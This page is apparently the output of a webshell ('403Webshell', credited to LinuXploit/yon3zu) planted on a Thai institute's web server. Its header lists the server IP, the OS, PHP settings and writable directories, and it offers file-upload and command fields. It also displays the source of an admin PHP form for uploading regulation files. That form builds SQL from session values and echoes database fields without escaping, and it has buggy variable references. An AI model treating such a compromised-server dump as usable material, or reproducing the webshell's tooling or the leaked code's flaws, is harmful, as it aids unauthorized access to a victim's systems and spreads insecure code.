403Webshell
Server IP : 202.29.229.35  /  Your IP : 18.117.8.176
Web Server : Apache
System : Linux aapanel2 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User : www ( 1001)
PHP Version : 5.5.38
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/www.ivecr2.ac.th/system_admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/www.ivecr2.ac.th/system_admin/regulationsForm.php
<?php 
session_start();
if($_SESSION['r_statuslogin'] != 1){
 echo '<script language="javascript">alert("สำหรับผู้ดูแลระบบเท่านั้น")</script>';
 echo'<meta http-equiv="refresh" content="0;url=../index.php">';
 exit();
}
			$wrokID=$_SESSION['r_workId'];
			//echo "---++".$wrokID;
			$adminID=$_SESSION['r_adID'];//รหัส ad
					$queryperlogin = "select * from tbl_datatecher1 where tecNumber='$adminid' ";
					$resultperlogin=mysqli_query($connect1,$queryperlogin);
					$rsperteclogin=mysqli_fetch_assoc($resultperlogin);
					
					$tecPrefixThailogin=$rsperteclogin['tecPrefixThai'];//คำนำหน้าชื่อ
					$selectworklogin = $rsperteclogin['selectwork'];//กลุ่มงาน
					//คำนำหน้าชื่อ
					$sqlpflogin="select * from ref_prefix_name where PREFIX_NAME_ID=$tecPrefixThai";
					$resulpflogin=mysqli_query($connect1,$sqlpflogin);
					$rspflogin=mysqli_fetch_assoc($resulpflogin);
					$tecPrefixThaiorilogin=$rspflogin['FULLNAME'];
					
					//ชื่อกลุ่มงาน
						$sqlworklogin="select * from tbl_departmentall where daNodpt='$selectworklogin' ";
						$resqlworklogin=mysqli_query($connect1,$sqlworklogin);
						$rsworklogin=mysqli_fetch_assoc($resqlworklogin);
						$worknamelogin = $rsworklogin['daFname'];
						
   						$tecnamelogin=$tecPrefixThaiorilogin."&nbsp;".$rsperteclogin['tecFnameThai']."&nbsp;&nbsp;".$tecLnamelogin=$rsperteclogin['tecLnameThai']." (".$worknamelogin.")";
	?>
<html>
<head>
<link rel="stylesheet" type="text/css" href="style.css" />
<script src="SpryAssets/SpryValidationTextField.js" type="text/javascript"></script>
<script src="SpryAssets/SpryValidationSelect.js" type="text/javascript"></script>
<link href="SpryAssets/SpryValidationTextField.css" rel="stylesheet" type="text/css">
<link href="SpryAssets/SpryValidationSelect.css" rel="stylesheet" type="text/css">
</head>
<body>
<form action="?i=regulations_inser" method="post" enctype="multipart/form-data" name="form1" id="form1">
  <table width="900" border="0" align="center" cellpadding="0" cellspacing="5">
    <tr>
      <td colspan="2" align="center" valign="top"><h3>.:: เพิ่มไฟล์กฎระเบียบและข้อบังคับของสถาบันฯ ::.</h3></td>
    </tr>
    <tr>
      <td align="right" valign="top">&nbsp;</td>
      <td align="left" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="right" valign="top">&nbsp;</td>
      <td align="left" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td width="189" align="right" valign="top">ชื่อที่ใช้แสดง :</td>
      <td width="696" align="left" valign="top"><label for="title"></label>
        <span id="sprytextfield1">
        <input name="title" type="text" id="title" size="50">
      <span class="textfieldRequiredMsg">กรุณาใส่ชื่อกฎระเบียบฯ</span></span></tr>
    <tr>
      <td align="right" valign="top">&nbsp;</td>
      <td align="left" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="right" valign="top">ประกาศ/ระเบียบ/ข้อบังคับ :</td>
      <td align="left" valign="top"><label for="selstatus"></label>
        <span id="spryselect1">
        <select name="selstatus" id="selstatus">
          <option selected>--------เลือก-------</option>
          <option value="1">ระเบียบของสถาบันฯ</option>
          <option value="2">ข้อบังคับของสถาบันฯ</option>
          <option value="3">ประกาศของสถาบันฯ</option>
        </select>
      <span class="selectRequiredMsg">*.</span></span></td>
    </tr>
    <tr>
      <td align="right" valign="top">&nbsp;</td>
      <td align="left" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td width="189" align="right" valign="top">แนบไฟล์  :</td>
      <td width="696" align="left" valign="top"><label for="title_file1"></label>
        <label for="fileDOC"></label>
        <input name="fileDOC" type="file" id="fileDOC" size="15">
        <font color="#FF0000">*.docx .xls .pdf เท่านั้น</font></td>
    </tr>
    <tr>
      <td align="right" valign="top">&nbsp;</td>
      <td align="left" valign="top">&nbsp;</td>
    </tr>
    <tr>
      <td align="right" valign="top">เขียนโดย :</td>
      <td align="left" valign="top">&nbsp;<?php echo $tecnamelogin;?></td>
    </tr>
    <tr>
      <td width="189" align="right" valign="top">&nbsp;</td>
      <td width="696" align="left" valign="top">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;
        <input type="submit" name="Submit" value="Submit" />
        &nbsp;&nbsp;
        <input type="reset" name="Submit2" value="Reset" /></td>
    </tr>
  </table>
</form>
<p>&nbsp; </p>

<table width="100%" border="0" align="center" cellpadding="0" cellspacing="1">
  <tr>
    <td width="42" height="28" align="center" valign="middle" bgcolor="#EBEBEB">&nbsp;</td>
    <td colspan="2" align="center" valign="middle" bgcolor="#EBEBEB"><strong>ระเบียบของสถาบันฯ</strong></td>
    <td width="345" align="center" valign="middle" bgcolor="#EBEBEB"><strong>วันที่อัพไฟล</strong>์</td>
  </tr>
 <?php

					
					if($wrokID == 1 || $wrokID == 5){
					$sql="select * from  tbl_regulations where statusreg = '1' order by df_ID desc";
					}else{
					$sql="select * from  tbl_regulations where statusreg = '1' and dp_ID='$wrokID' order by df_ID desc";	
					}
					$result=mysqli_query($connect1,$sql);
					$num_dp=mysqli_num_rows($result);
					while($rs=mysqli_fetch_assoc($result)){
						
					$dp_ID=$rs['dp_ID'];
					$queryper = "select * from tbl_datatecher1 where tecNumber='$dp_ID' ";
					//echo $queryper;
					$resultper=mysqli_query($connect1,$queryper);
					$rspertec=mysqli_fetch_assoc($resultper);
					
					$tecPrefixThai=$rspertec['tecPrefixThai'];//คำนำหน้าชื่อ
					$selectwork = $rspertec['selectwork'];//กลุ่มงาน
					//คำนำหน้าชื่อ
					$sqlpf="select * from ref_prefix_name where PREFIX_NAME_ID=$tecPrefixThai";
					$resulpf=mysqli_query($connect1,$sqlpf);
					$rspf=mysqli_fetch_assoc($resulpf);
					$tecPrefixThaiori=$rspf['FULLNAME'];
					
						//ชื่อกลุ่มงาน
						$sqlwork="select * from tbl_departmentall where daNodpt='$selectwork' ";
						$resqlwork=mysqli_query($connect1,$sqlwork);
						$rswork=mysqli_fetch_assoc($resqlwork);
						$workname = $rswork['daFname'];
						
   						$workusername=$tecPrefixThaiori."&nbsp;".$rspertec['tecFnameThai']."&nbsp;&nbsp;".$tecLname=$rspertec['tecLnameThai']." (".$workname.")";
					if($bg == "#F5F5F5") {
						$bg = "#FDFDFD";
					} else {
						$bg = "#F5F5F5";
					}
					
		  ?>
  <tr bgcolor="<?php echo $bg?>"  >
    <td width="42" align="center" valign="top" bgcolor="<?php echo $bg?>"><img src="images/icon07.png" width="20" height="12" /></td>
    <td width="1097" align="left" valign="middle" bgcolor="<?php echo $bg?>">&nbsp;&nbsp; 
    
    <?php if($rs['status'] == 0){ ?>
    <a href="file_regulations/<?php echo $rs['df_file'];?>" target="_blank"><?php echo $rs['df_title'];?></a>
    <?php }else{ ?>
     <a href="file_regulations/<?php echo $rs['df_file'];?>" target="_blank"><font color="#FF0000"><?php echo $rs['df_title'];?></font></a>
     <?php } ?>
   &nbsp; <font color="#0099FF" size="-2"><i>โดย :<?php echo $workusername;?></i> </font></td>
    <td width="179" align="center" valign="top" bgcolor="<?php echo $bg?>">
    
    <a href="index.php?i=delete_regulationsForm&df_ID=<?php echo $rs['df_ID'];?>"><img src="images/33333.jpg" width="18" height="16" border="0" /></a>
    &nbsp;&nbsp; || 
    
  
    
<?php if($rs['status'] == 0){ ?>
  		 <a href="index.php?i=updstatus_regulations&st=1&df_ID=<?php echo $rs['df_ID'];?>">ซ่อน</a>
<?php }else{ ?>
		 <a href="index.php?i=updstatus_regulations&st=0&df_ID=<?php echo $rs['df_ID'];?>">แสดง</a>
<?php } ?>

||&nbsp;
    
     </td>
    <td width="345" align="left" valign="top" bgcolor="<?php echo $bg?>">เมื่อ :: <?php echo displaydate($rs['df_date']);?></td>
  </tr>
  <?php
				}
				
		  ?>
</table>
<p>&nbsp;</p>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="1">
  <tr>
    <td width="42" height="28" align="center" valign="middle" bgcolor="#EBEBEB">&nbsp;</td>
    <td colspan="2" align="center" valign="middle" bgcolor="#EBEBEB"><strong>ข้อบังคับของสถาบันฯ</strong></td>
    <td width="345" align="center" valign="middle" bgcolor="#EBEBEB"><strong>วันที่อัพไฟล</strong>์</td>
  </tr>
  <?php
					if($wrokID == 1 || $wrokID == 5){
					$sql1="select * from  tbl_regulations where statusreg = '2' order by df_ID desc";
					}else{
					$sql1="select * from  tbl_regulations where statusreg = '2' and dp_ID='$wrokID' order by df_ID desc";	
					}
					$result1=mysqli_query($connect1,$sql1);
					$num_dp1=mysqli_num_rows($result1);
					while($rs1=mysqli_fetch_assoc($result1)){
						
					$dp_ID1=$rs1['dp_ID'];
						
					$queryper1 = "select * from tbl_datatecher1 where tecNumber='$dp_ID1' ";
					//echo $queryper;
					$resultper1=mysqli_query($connect1,$queryper1);
					$rspertec1=mysqli_fetch_assoc($resultper1);
					
					$tecPrefixThai1=$rspertec1['tecPrefixThai'];//คำนำหน้าชื่อ
					$selectwork1 = $rspertec1['selectwork'];//กลุ่มงาน
					//คำนำหน้าชื่อ
					$sqlpf1="select * from ref_prefix_name where PREFIX_NAME_ID=$tecPrefixThai1";
					$resulpf1=mysqli_query($connect1,$sqlpf1);
					$rspf1=mysqli_fetch_assoc($resulpf1);
					$tecPrefixThaiori1=$rspf1['FULLNAME'];
					
						//ชื่อกลุ่มงาน
						$sqlwork1="select * from tbl_departmentall where daNodpt='$selectwork1' ";
						$resqlwork1=mysqli_query($connect1,$sqlwork1);
						$rswork1=mysqli_fetch_assoc($resqlwork1);
						$workname1 = $rswork1['daFname'];
						
   						$workusername1=$tecPrefixThaiori1."&nbsp;".$rspertec1['tecFnameThai']."&nbsp;&nbsp;".$tecLname1=$rspertec1['tecLnameThai']." (".$workname1.")";
					if($bg1 == "#F5F5F5") {
						$bg1 = "#FDFDFD";
					} else {
						$bg1 = "#F5F5F5";
					}
					
		  ?>
  <tr bgcolor="<?php echo $bg1;?>"  >
    <td width="42" align="center" valign="top" bgcolor="<?php echo $bg1; ?>"><img src="images/icon07.png" width="20" height="12" /></td>
    <td width="1106" align="left" valign="middle" bgcolor="<?php echo $bg1; ?>">&nbsp;&nbsp; 
    
    <?php if($rs1['status'] == 0){ ?>
    <a href="file_regulations/<?php echo $rs1['df_file'];?>" target="_blank"><?php echo $rs1['df_title'];?></a>
    <?php }else{ ?>
     <a href="file_regulations/<?php echo $rs1['df_file'];?>" target="_blank"><font color="#FF0000"><?php echo $rs1['df_title'];?></font></a>
     <?php } ?>
    
    &nbsp; <font color="#0099FF" size="-2"><i>โดย : <?php echo $workusername1;?></i></font></td>
    <td width="170" align="center" valign="top" bgcolor="<?php echo $bg1; ?>">
    
    <a href="index.php?i=delete_regulationsForm&df_ID=<?php echo $rs1['df_ID'];?>"><img src="images/33333.jpg" width="18" height="16" border="0" /></a>
     &nbsp;&nbsp; || 
<?php if($rs['status'] == 0){ ?>
  		 <a href="index.php?i=updstatus_regulations&st=1&df_ID=<?php echo $rs1['df_ID'];?>">ซ่อน</a>
<?php }else{ ?>
		 <a href="index.php?i=updstatus_regulations&st=0&df_ID=<?php echo $rs1['df_ID'];?>">แสดง</a>
<?php } ?>

||&nbsp;
    
    </td>
    
    
    <td width="345" align="left" valign="top" bgcolor="<?php echo $bg1; ?>">เมื่อ :: <?php echo displaydate($rs1['df_date']);?></td>
  </tr>
  <?php
				}
				
		  ?>
</table>
<p>&nbsp;</p>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="1">
  <tr>
    <td width="42" height="28" align="center" valign="middle" bgcolor="#EBEBEB">&nbsp;</td>
    <td colspan="2" align="center" valign="middle" bgcolor="#EBEBEB"><strong>ประกาศของสถาบันฯ</strong></td>
    <td width="346" align="center" valign="middle" bgcolor="#EBEBEB"><strong>วันที่อัพไฟล</strong>์</td>
  </tr>
  <?php
					if($wrokID ==  1 || $wrokID == 5){
					$sql2="select * from  tbl_regulations where statusreg = '3' order by df_ID desc";
					}else{
					$sql2="select * from  tbl_regulations where statusreg = '3' and dp_ID='$wrokID' order by df_ID desc";	
					}
					$result2=mysqli_query($connect1,$sql2);
					$num_dp2=mysqli_num_rows($result2);
					while($rs2=mysqli_fetch_assoc($result2)){
						
					$dp_ID2=$rs2['dp_ID'];
						
						$queryper1 = "select * from tbl_datatecher1 where tecNumber='$dp_ID1' ";
					//echo $queryper;
					$resultper1=mysqli_query($connect1,$queryper1);
					$rspertec1=mysqli_fetch_assoc($resultper1);
					
					$tecPrefixThai1=$rspertec1['tecPrefixThai'];//คำนำหน้าชื่อ
					$selectwork1 = $rspertec1['selectwork'];//กลุ่มงาน
					//คำนำหน้าชื่อ
					$sqlpf1="select * from ref_prefix_name where PREFIX_NAME_ID=$tecPrefixThai1";
					$resulpf1=mysqli_query($connect1,$sqlpf1);
					$rspf1=mysqli_fetch_assoc($resulpf1);
					$tecPrefixThaiori1=$rspf1['FULLNAME'];
					
						//ชื่อกลุ่มงาน
						$sqlwork1="select * from tbl_departmentall where daNodpt='$selectwork1' ";
						$resqlwork1=mysqli_query($connect1,$sqlwork1);
						$rswork1=mysqli_fetch_assoc($resqlwork1);
						$workname1 = $rswork1['daFname'];
						
   						$workname2=$tecPrefixThaiori1."&nbsp;".$rspertec1['tecFnameThai']."&nbsp;&nbsp;".$tecLname1=$rspertec1['tecLnameThai']." (".$workname1.")";
							
					if($bg2 == "#F5F5F5") {
						$bg2 = "#FDFDFD";
					} else {
						$bg2 = "#F5F5F5";
					}
					
		  ?>
  <tr bgcolor="<?php echo $bg2;?>"  >
    <td width="42" align="center" valign="top" bgcolor="<?php echo $bg2; ?>"><img src="images/icon07.png" width="20" height="12" /></td>
    <td width="1090" align="left" valign="middle" bgcolor="<?php echo $bg2; ?>">&nbsp;&nbsp; 
    
    <?php if($rs2['status'] == 0){ ?>
    <a href="file_regulations/<?php echo $rs2['df_file'];?>" target="_blank"><?php echo $rs2['df_title'];?></a>
    <?php }else{ ?>
     <a href="file_regulations/<?php echo $rs2['df_file'];?>" target="_blank"><font color="#FF0000"><?php echo $rs2['df_title'];?></font></a>
     <?php } ?>
    
    
    &nbsp; <font color="#0099FF" size="-2"><i>โดย : <?php echo $workname2;?></i></font></td>
    <td width="185" align="center" valign="top" bgcolor="<?php echo $bg2; ?>">
    <a href="index.php?i=delete_regulationsForm&df_ID=<?php echo $rs2['df_ID'];?>"><img src="images/33333.jpg" width="18" height="16" border="0" /></a>
     &nbsp;&nbsp; || 
<?php if($rs['status'] == 0){ ?>
  		 <a href="index.php?i=updstatus_regulations&st=1&df_ID=<?php echo $rs2['df_ID'];?>">ซ่อน</a>
<?php }else{ ?>
		 <a href="index.php?i=updstatus_regulations&st=0&df_ID=<?php echo $rs2['df_ID'];?>">แสดง</a>
<?php } ?>

||&nbsp;
    </td>
    <td width="346" align="left" valign="top" bgcolor="<?php echo $bg2; ?>">เมื่อ :: <?php echo displaydate($rs2['df_date']);?></td>
  </tr>
  <?php
				}
				
		  ?>
</table>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<script type="text/javascript">
var sprytextfield1 = new Spry.Widget.ValidationTextField("sprytextfield1");
var spryselect1 = new Spry.Widget.ValidationSelect("spryselect1");
</script>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit